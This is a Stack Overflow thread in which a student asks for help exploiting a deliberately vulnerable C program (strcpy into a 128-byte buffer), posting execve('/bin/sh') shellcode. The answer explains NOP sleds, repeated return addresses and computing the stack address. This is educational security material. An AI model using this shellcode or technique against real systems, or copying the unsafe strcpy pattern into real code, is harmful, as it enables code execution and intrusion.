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I'm trying to figure out this problem for one of my comp sci classes, I've utilized every resource and still having issues, if someone could provide some insight, I'd greatly appreciate it.

I have this "target" I need to execute a execve(“/bin/sh”) with the buffer overflow exploit. In the overflow of buf[128], when executing the unsafe command strcpy, a pointer back into the buffer appears in the location where the system expects to find return address.

target.c

int bar(char *arg, char *out)
{
 strcpy(out,arg);
 return 0;
}

int foo(char *argv[])
{
 char buf[128];
 bar(argv[1], buf);
}

int main(int argc, char *argv[])
{
 if (argc != 2)
 {
  fprintf(stderr, "target: argc != 2");
  exit(EXIT_FAILURE);
 }
 foo(argv);
 return 0;
}

exploit.c

#include "shellcode.h"

#define TARGET "/tmp/target1"

int main(void)
{
  char *args[3];
  char *env[1];

  args[0] = TARGET; args[1] = "hi there"; args[2] = NULL;
  env[0] = NULL;

  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  return 0;
}

shellcode.h

static char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

I understand I need to fill argv[1] with over 128 bytes, the bytes over 128 being the return address, which should be pointed back to the buffer so it executes the /bin/sh within. Is that correct thus far? Can someone provide the next step?

Thanks very much for any help.

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1  
A stack overflow and a buffer overflow are two quite different things. –  BoltClock Oct 5 '10 at 3:29
    
This is highly dependent on your system (compiler, CPU etc), and you haven't bothered to specify any of that. –  Tony D Oct 5 '10 at 4:04
    
I couldn't help but notice that your shell code is an exact copy of the one found here. You should probably read through this article, and understand what is going on so you can implement your own. Plagiarism in university is serious stuff. –  Paul Oct 5 '10 at 4:05
    
@Paul: First of all, this has not been assigned by our professor, it is a problem I'm trying to work through from our book to prepare for an exam. Second, I'm using that article to attempt to solve the problem, it was mentioned by our professor as a helpful outside reference, but I'm having trouble fully comprehending the material. @Tony: Intel CPU with gcc 4.1.2, working on Debian 4.1.1 –  CRO Oct 5 '10 at 4:06
    
@Paul: why so serious? =p –  jyzuz Oct 7 '10 at 14:30
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1 Answer

up vote 3 down vote accepted

Well, so you want the program to execute your shellcode. It's already in machine form, so it's ready to be executed by the system. You've stored it in a buffer. So, the question would be "How does the system know to execute my code?" More precisely, "How does the system know where to look for the next code to be executed?" The answer in this case is the return address you're talking about.

Basically, you're on the right track. Have you tried executing the code? One thing I've noticed when performing this type of exploit is that it's not an exact science. Sometimes, there are other things in memory that you don't expect to be there, so you have to increase the number of bytes you add into your buffer in order to correctly align the return address with where the system expects it to be.

I'm not a specialist in security, but I can tell you a few things that might help. One is that I usually include a 'NOP Sled' - essentially just a series of 0x90 bytes that don't do anything other than execute 'NOP' instructions on the processor. Another trick is to repeat the return address at the end of the buffer, so that if even one of them overwrites the return address on the stack, you'll have a successful return to where you want.

So, your buffer will look like this:

| NOP SLED | SHELLCODE | REPEATED RETURN ADDRESS |

(Note: These aren't my ideas, I got them from Hacking: The Art of Exploitation, by Jon Erickson. I recommend this book if you're interested in learning more about this).

To calculate the address, you can use something similar to the following:

unsigned long sp(void) 
{ __asm__("movl %esp, %eax");} // returns the address of the stack pointer

int main(int argc, char *argv[])
{
    int i, offset;
    long esp, ret, *addr_ptr;
    char* buffer;

    offset = 0;
    esp = sp();
    ret = esp - offset;
}

Now, ret will hold the return address you want to return to, assuming that you allocate buffer to be on the heap.

share|improve this answer
    
Very well explained, thanks very much for taking the time to help. –  CRO Oct 5 '10 at 4:21
    
I was a CSCI student once. I know learning the buffer overflow is difficult - I actually had to get similar help when I took my first undergraduate course in computer architecture. :) Just hope I could help. –  jwir3 Oct 5 '10 at 4:29
    
Altough Jon Erickson's book is really nice, I would recommend "The Shellcoders Handbook". IMHO it's more advanced, it assumes you already know some stuffs (asm, C, OS details..) –  jyzuz Nov 8 '10 at 15:47
    
Yes, I agree that The Shellcoder's Handbook is also a fantastic reference. –  jwir3 Nov 11 '10 at 15:39
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